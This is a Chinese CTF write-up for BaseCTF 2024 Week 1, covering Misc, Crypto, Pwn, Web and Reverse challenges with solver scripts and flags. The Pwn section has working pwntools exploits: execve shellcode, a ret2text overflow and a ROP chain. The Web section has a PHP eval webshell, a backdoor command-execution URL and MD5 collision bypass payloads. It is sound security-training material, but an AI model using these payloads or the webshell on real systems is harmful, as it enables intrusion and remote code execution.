BaseCTF2024 Week1 Writeup
G3rling
|
|
比赛WriteUp
|
41
|
0
|

Misc

倒计时?海报!

从倒计时海报中得到flag

BaseCTF{c0unt_d0wn_fro3_X_every_d@y_i5_re@11y_c0o1_@nd_h@rd_t0_do_1t_ev3ry_n1ght}

签到!DK 盾!

微信公众号发送 BaseCTF2024 ,获得 Flag

image-20240815092800694

BaseCTF{2024_sp0n5ored_by_dkdun}

喵喵太可爱了

群友太厉害了

BaseCTF{m1a0_mi@o_1s_n0t_a_b3tr4yer_t0_t3l1_the_f1ag}

捂住X只耳

非常规的音频隐写

根据题目提示拆分左右两个声道,再对声道内容进行比对,流程如下:

1.选中左声道,在效果中选择反相(上下)。
2.全选轨道,在轨道中选择混⾳->混⾳并渲染到新轨道。

查看频谱图发现摩斯密码

image-20240821180323479

进行解码得到flag

BaseCTF{FOLLOWYOURHEART}

人生苦短,我用Python

分析题目附件代码进行复原

len(flag) == 38

flag 的长度必须是 38 个字符。

flag.startswith('BaseCTF{')

flag 以 BaseCTF{ 开头

flag.find('Mp') == 10

Mp 在 flag 中的处于第 11 个字符

flag[-3:] * 8 == '3x}3x}3x}3x}3x}3x}3x}3x}

flag 的最后 3 个字符重复 8 次得到的字符串是 3x}3x}3x}3x}3x}3x}3x}3x} 。说明 flag 的最后 3 个字符是 3x}

ord(flag[-1]) == 125

flag 的最后一个字符的 ASCII 码值为 125 ,对应的字符是 }

flag.count('_') // 2 == 2

flag 中 的出现次数除以 2 的结果为 2,说明 flag 中有 4 个 

list(map(len, flag.split('_'))) == [14, 2, 6, 4, 8]

将 flag 按 _ 分割后,每个部分的长度分别是 14, 2, 6, 4, 8

flag[12:32:4] == 'lsT_n'

从 flag 的第 13 个字符开始,每隔 4 个字符取一个字符,结果为 'lsT_n'

'😺'.join([c.upper() for c in flag[:9]]) == 'B😺A😺S😺E😺C😺T😺F😺{😺S'

flag 的前 9 个字符转为大写字母,然后用字符 '😺' 连接这些字母,结果为 'B😺A😺S😺E😺C😺T😺F😺{😺S'

flag[-11].isnumeric() or int(flag[-11]) ** 5 == 1024

flag 的倒数第 11 个字符必须是数字,5 次方的结果是 1024。说明 flag 的倒数第 11 位是 4 

base64.b64encode(flag[-7:-3].encode()) == b'MG1QbA\=='

flag 的倒数第 7 个到倒数第 4 个字符经过 Base64 编码后的结果是 b'MG1QbA\=='。说明 flag 倒数第 7 个到倒数第 4 个字符为 0mPl

flag[::-7].encode().hex() == '7d4372733173'

将 flag 每隔 7 个字符反向排列后进行编码,得到的十六进制字符串是 '7d4372733173',字符为 }Crs1s

set(flag[12::11]) == {'l', 'r'}

从 flag 的第 13 个字符开始,每隔 11 个字符取一个字符,得到的字符集合是 {'l', 'r'}。说明 flag 的第 12、23、34 个字符中只包含 'l' 和 'r'

flag[21:27].encode() == bytes([116, 51, 114, 95, 84, 104])

flag 的第 22 到第 27 个字符的字节编码值为 [116, 51, 114, 95, 84, 104] 。说明第 22 到第 27 个字符为 't3r_Th'。

sum(ord(c) * 2024_08_15 ** idx for idx, c in enumerate(flag[17:20])) == 41378751114180610

对 flag 中第 18 到第 20 个字符的 ASCII 值,按其在子串中的位置(索引)和常数 2024_08_15 的幂次进行加权求和,结果为 41378751114180610,即 _Be

all([flag[0].isalpha(), flag[8].islower(), flag[13].isdigit()])

flag 的第一个字符必须是字母,第九个字符必须是小写字母,第十四个字符必须是数字

'{whats} {up}'.format(whats=flag[13], up=flag[15]).replace('3', 'bro') == 'bro 1'

格式化字符串 '{whats} {up}' 中,whats 被替换为 flag 的第 14 个字符,up 被替换为第 16 个字符。替换所有 '3' 为 'bro' 后的结果应该是 'bro 1'。说明第14个字符是 '3',第16个字符是 '1'。

hashlib.sha1(flag.encode()).hexdigest() == 'e40075055f34f88993f47efb3429bd0e44a7f479'

flag 的 SHA-1 哈希值为 'e40075055f34f88993f47efb3429bd0e44a7f479'。

综上所述,得到flag

BaseCTF{s1Mpl3_1s_BeTt3r_Th4n_C0mPl3x}

Base

Cyber中一把梭

BaseCTF{we1c0me_to_b4sectf}

正着看还是反着看呢?

010分析发现需要将十六进制reverse,处理后得到jpg图片,分离后得到一个压缩包文件,解压得到flag

BaseCTF{h3ll0_h4cker}

海上遇到了鲨鱼

Wireshark打开后导出HTTP对象,在flag.php中找到字符串

}67bf613763ca-50b3-4437-7a3a-b683fe51{FTCesaB

reverse后得到flag

BaseCTF{15ef386b-a3a7-7344-3b05-ac367316fb76}

根本进不去啊!

Dig 指令可以用于查询DNS,最常用的查询是A记录,TXT(文本注释),MX记录,NS记录,或者任意综合查询。

看了提示才明白是通过dig命令将域名解析到TXT(文本注释)

dig txt flag.basectf.fun

; <<>> DiG 9.18.28-0ubuntu0.22.04.1-Ubuntu <<>> txt flag.basectf.fun
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23701
;; flags: qr rd ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;flag.basectf.fun.              IN      TXT

;; ANSWER SECTION:
flag.basectf.fun.       0       IN      TXT     "FLAG: BaseCTF{h0h0_th1s_15_dns_rec0rd}"

;; Query time: 2060 msec
;; SERVER: 172.25.64.1#53(172.25.64.1) (UDP)
;; WHEN: Fri Aug 16 21:28:08 CST 2024
;; MSG SIZE  rcvd: 101

得到flag

BaseCTF{h0h0_th1s_15_dns_rec0rd}

你也喜欢圣物吗

附件为一个加密压缩包和图片,分析图片,在RGB通道中发现key

RGB:key=lud1_lud1

解压后得到一个名为it is fake.zip的压缩包,复原伪加密后解压,得到一串base64

ZmxhZ3swaF9uMF9pdCdzX2Yza2V9UW1GelpVTlVSbnN4ZFRCZmNURmZlREZmTlRGck1YMD0=

两次解码后得到flag

flag{0h_n0_it's_f3ke}QmFzZUNURnsxdTBfcTFfeDFfNTFrMX0=  base64
BaseCTF{1u0_q1_x1_51k1}

Crypto

你会算md5吗

根据md5值反推

import hashlib

output = ''
dic = ['9d5ed678fe57bcca610140957afab571', '0cc175b9c0f1b6a831c399e269772661', '03c7c0ace395d80182db07ae2c30f034', 'e1671797c52e15f763380b45e841ec32', '0d61f8370cad1d412f80b84d143e1257', 'b9ece18c950afbfa6b0fdbfa4ff731d3', '800618943025315f869e4e1f09471012', 'f95b70fdc3088560732a5ac135644506', '0cc175b9c0f1b6a831c399e269772661', 'a87ff679a2f3e71d9181a67b7542122c', '92eb5ffee6ae2fec3ad71c777531578f', '8fa14cdd754f91cc6554c9e71929cce7', 'a87ff679a2f3e71d9181a67b7542122c', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '0cc175b9c0f1b6a831c399e269772661', 'e4da3b7fbbce2345d7772b0674a318d5', '336d5ebc5436534e61d16e63ddfca327', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '8fa14cdd754f91cc6554c9e71929cce7', '8fa14cdd754f91cc6554c9e71929cce7', '45c48cce2e2d7fbdea1afc51c7c6ad26', '336d5ebc5436534e61d16e63ddfca327', 'a87ff679a2f3e71d9181a67b7542122c', '8f14e45fceea167a5a36dedd4bea2543', '1679091c5a880faf6fb5e6087eb1b2dc', 'a87ff679a2f3e71d9181a67b7542122c', '336d5ebc5436534e61d16e63ddfca327', '92eb5ffee6ae2fec3ad71c777531578f', '8277e0910d750195b448797616e091ad', '0cc175b9c0f1b6a831c399e269772661', 'c81e728d9d4c2f636f067f89cc14862c', '336d5ebc5436534e61d16e63ddfca327', '0cc175b9c0f1b6a831c399e269772661', '8fa14cdd754f91cc6554c9e71929cce7', 'c9f0f895fb98ab9159f51fd0297e236d', 'e1671797c52e15f763380b45e841ec32', 'e1671797c52e15f763380b45e841ec32', 'a87ff679a2f3e71d9181a67b7542122c', '8277e0910d750195b448797616e091ad', '92eb5ffee6ae2fec3ad71c777531578f', '45c48cce2e2d7fbdea1afc51c7c6ad26', '0cc175b9c0f1b6a831c399e269772661', 'c9f0f895fb98ab9159f51fd0297e236d', '0cc175b9c0f1b6a831c399e269772661', 'cbb184dd8e05c9709e5dcaedaa0495cf']

for data in dic:
    for i in range(32, 127):
        md5 = hashlib.md5()
        md5.update(chr(i).encode())
        if md5.hexdigest() == data:
            output+=chr(i)
print(output)

# BaseCTF{a4bf43a5-3ff9-4764-bda2-af8ee4db9a8a}

ez_rsa

通过 n 和 (p-2)*(q-2) 构建phi

from Crypto.Util.number import *
import gmpy2

n=96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790344897976690691139671461342896437428086142262969360560293350630096355947291129943172939923835317907954465556018515239228081131167407674558849860647237317421
e=65537
c=37077223015399348092851894372646658604740267343644217689655405286963638119001805842457783136228509659145024536105346167019011411567936952592106648947994192469223516127472421779354488529147931251709280386948262922098480060585438392212246591935850115718989480740299246709231437138646467532794139869741318202945
not_phi=96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790384900615665394180812810697286554008262030049280213663390855887077502992804805794388166197820395507600028816810471093163466639673142482751115353389655533205

p_q=(not_phi -n -4)//2 

phi=not_phi - 3*p_q -3

d=gmpy2.invert(e,phi)
m=pow(c,d,n)

print(long_to_bytes(m))

# BaseCTF{it_1s_ez!!}

helloCrypto

AES解密

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

key = 208797759953288399620324890930572736628
ciphertext = b'U\xcd\xf3\xb1 r\xa1\x8e\x88\x92Sf\x8a`Sk],\xa3(i\xcd\x11\xd0D\x1edd\x16[&\x92@^\xfc\xa9(\xee\xfd\xfb\x07\x7f:\x9b\x88\xfe{\xae'

key_bytes = key.to_bytes(16, byteorder='big')
cipher = AES.new(key=key_bytes, mode=AES.MODE_ECB)

decrypted_padded = cipher.decrypt(ciphertext)
decrypted = unpad(decrypted_padded, AES.block_size)

print(decrypted.decode())

# BaseCTF{b80bf679-1869-4fde-b3f9-d51b872d31fb}

十七倍

17在 mod 256下的乘法逆元是241

flag=''
cipher = [98, 113, 163, 181, 115, 148, 166, 43, 9, 95, 165, 146, 79, 115, 146, 233, 112, 180, 48, 79, 65, 181, 113, 146, 46, 249, 78, 183, 79, 133, 180, 113, 146, 148, 163, 79, 78, 48, 231, 77]

for i in cipher:
    flag+= chr(i * 241 % 256)

print(flag)

# BaseCTF{yoUr_CrYpt0_1earNinG_5tarTs_n0w}

babyrsa

n很大,维纳攻击

babypack

ez_math

Pwn

echo

通过echo重定向输出flag

echo $(</flag)
BaseCTF{7aa12525-59e7-4975-83c7-847583c8cfc3}

签个到吧

签到题

C:\Users\Xia\Desktop>nc challenge.basectf.fun 22508
ls
bin
dev
flag
lib
lib32
lib64
libexec
libx32
pwn
cat flag
BaseCTF{7ac71e2c-0a46-41a0-9ed8-116f0d30825e}

shellcode_level0

检查保护情况,发现除了Canary其他保护都开了

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

虽然开了代码执行保护,但是mmap函数又将read处权限改为了可读可写可执行,考虑ret2shellcode

buf = mmap(0LL, 0x1000uLL, 7, 34, -1, 0LL);
from pwn import *

p= remote('challenge.basectf.fun',40496)

shellcode=b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"

p.sendlineafter("please input shellcode:",shellcode)
p.interactive()

# BaseCTF{9b3c2e70-5f43-4556-9172-da7ca95f43b4}

Ret2text

检查保护情况,只开了代码执行保护

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

发现后门函数,考虑ret2text

from pwn import*

io=remote("challenge.basectf.fun",28971)

bin_sh_add=0x4011BB
# bin_sh_add=0x4011A4
# ret_add=0x40101a

payload=b'a'*(0x20+8)+p64(bin_sh_add)
# payload=b'a'*(0x20+8)+p64(ret_add)+p64(bin_sh_add)

io.sendline(payload)

io.interactive()

这里需要注意的是如果的bin_sh_add在push之前,需要进行栈对齐,

我把她丢了

检查保护情况,只开了代码执行保护

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

检查字符串,发现“bin/sh”字符串以及system可进行调用,考虑ret2syscall。

首先找到call _system的地址和字符串/bin/sh的地址,64位中寄存器的顺序为 rdi->rsi->rdx->rcx->r8->r9,所以还需要找到rdi的地址

ROPgadget --binary 1 --only "pop|ret" |grep rdi
0x0000000000401196 : pop rdi ; ret
from pwn import*

io=remote("challenge.basectf.fun",23092)

sys_add=0x40120F
bin_sh_add=0x402008
pop_ret_rdi=0x401196

payload=b'a'*(0x70+8)+p64(pop_ret_rdi)+p64(bin_sh_add)+p64(sys_add)

io.sendlineafter(b"Help me find her.",payload)

io.interactive()

# BaseCTF{b27be698-3f93-412a-8a24-fcec5b7974ad}

Web

HTTP 是什么呀

传参成功后在请求包中发现flag

GET /success.php?flag=QmFzZUNURnszZDE0YTBlNi01ZDMxLTQ2MTctYmE0Mi0yYWIwOGE5NmIwMDJ9Cg== HTTP/1.1

base64解码后得到flag

BaseCTF{3d14a0e6-5d31-4617-ba42-2ab08a96b002}

喵喵喵´•ﻌ•`

有后门,利用后门进行命令执行

http://challenge.basectf.fun:20896/?DT=system(%27cat%20/flag%27);

得到flag

BaseCTF{080a5a58-2bb5-4803-8029-dc9d8868441d}

md5绕过欸

第一层是0e绕过:处理hash字符串时,PHP会将每一个以 0E开头的哈希值解释为0,那么只要传入的不同字符串经过哈希以后是以 0E开头的,那么PHP会认为它们相同

if ($name != $password && md5($name) == md5($password)){

md5 值是 0e 开头的字符串 ,在 php 弱类型比较中判断为相等

s878926199a
s155964671a
s214587387a
s214587387a
s878926199a
s1091221200a
s1885207154a
s1502113478a
s1885207154a
s1836677006a
s155964671a
s1184209335a
s1665632922a
s1502113478a
s1836677006a
s1091221200a
s155964671a
s1502113478a
s155964671a
s1665632922a
s155964671a
s1091221200a
s1836677006a
s1885207154a
s532378020a
s878926199a
s1091221200a
s214587387a
s1502113478a
s1091221200a
s1665632922a
s1885207154a
s1836677006a
s1665632922a
s878926199a
240610708 
314282422 
571579406 
903251147 
1110242161 
1320830526 
1586264293 
2302756269 
2427435592 
2653531602 
3293867441 
3295421201 
3465814713 
3524854780 
3908336290 
4011627063 
4775635065 
4790555361 
5432453531 
5579679820 
5585393579 
6376552501 
7124129977 
7197546197 
7656486157 
QLTHNDT 
QNKCDZO 
EEIZDOI 
TUFEPMC 
UTIPEZQ 
UYXFLOI 
IHKFRNS 
PJNPDWY 
ABJIHVY 
DQWRASX 
DYAXWCA
GEGHBXL 
GGHMVOE 
GZECLQZ 
NWWKITQ 
NOOPCJF 
MAUXXQC 
MMHUWUV

第二层是强类型绕过

if ($name2 !== $password2 && md5($name2) === md5($password2))

一些MD5值相等的字符串

$Param1=
%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

$Param2=
%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
$data1=
%d1%31%dd%02%c5%e6%ee%c4%69%3d%9a%06%98%af%f9%5c%2f%ca%b5%07%12%46%7e%ab%40%04%58%3e%b8%fb%7f%89%55%ad%34%06%09%f4%b3%02%83%e4%88%83%25%f1%41%5a%08%51%25%e8%f7%cd%c9%9f%d9%1d%bd%72%80%37%3c%5b%d8%82%3e%31%56%34%8f%5b%ae%6d%ac%d4%36%c9%19%c6%dd%53%e2%34%87%da%03%fd%02%39%63%06%d2%48%cd%a0%e9%9f%33%42%0f%57%7e%e8%ce%54%b6%70%80%28%0d%1e%c6%98%21%bc%b6%a8%83%93%96%f9%65%ab%6f%f7%2a%70

$data2=
%d1%31%dd%02%c5%e6%ee%c4%69%3d%9a%06%98%af%f9%5c%2f%ca%b5%87%12%46%7e%ab%40%04%58%3e%b8%fb%7f%89%55%ad%34%06%09%f4%b3%02%83%e4%88%83%25%71%41%5a%08%51%25%e8%f7%cd%c9%9f%d9%1d%bd%f2%80%37%3c%5b%d8%82%3e%31%56%34%8f%5b%ae%6d%ac%d4%36%c9%19%c6%dd%53%e2%b4%87%da%03%fd%02%39%63%06%d2%48%cd%a0%e9%9f%33%42%0f%57%7e%e8%ce%54%b6%70%80%a8%0d%1e%c6%98%21%bc%b6%a8%83%93%96%f9%65%2b%6f%f7%2a%70

构造payload

http://challenge.basectf.fun:40369/?name=s878926199a&&name2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

password=s155964671a&&password2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

得到flag

BaseCTF{12962a75-f710-4766-8c9a-b0675563f413}

A Dark Room

在源代码中找到flag

BaseCTF{844dbf90-e38f-4604-aea0-b07c3fff4cc7}

upload

上传一句话木马

<?php 
@eval($_POST['a']); 
?>

蚁剑连接,找到flag

BaseCTF{1496a3e2-dce7-4195-8c7b-2659a848f5ad}

Reverse

You are good at IDA

打开IDA后查看字符串,发现hint1

This is the first part.You can shift f12 look look

定位到原函数,找到flag1

Y0u_4Re_

继续查看hint2内容

This is the second part.

定位到原函数,Ascii码解码得到flag2

900d_47_

查看hint3内容

Only the last part remains.The last part is in a named Interesting's func

定位到Interesting函数,Ascii解码得到flag3

id4

综上所述,得到flag

BaseCTF{Y0u_4Re_900d_47_id4}

UPX mini

查壳,发现有UPX1,进行脱壳

image-20240816090551085

脱壳后打开得到以下信息,解码得到flag

QmFzZUNURntIYXYzX0BfZzBvZF90MW0zISEhfQ==    base64
BaseCTF{Hav3_@_g0od_t1m3!!!}

Ez Xor

暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																

							
							
						

																

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
BaseCTF2024 Week4 Writeup

							
							

							
BaseCTF2024 Week3 Writeup

							
							

							
BaseCTF2024 Week2 Writeup

							
							

							
羊城杯2024 Writeup

							
							

							
MuleCTF Writeup

							
							

							
TFCCTF2024 Writeup

							
							

							
XGCTF西瓜杯 Writeup

							
							

							
第五届“闽盾杯”Misc部分复现Writeup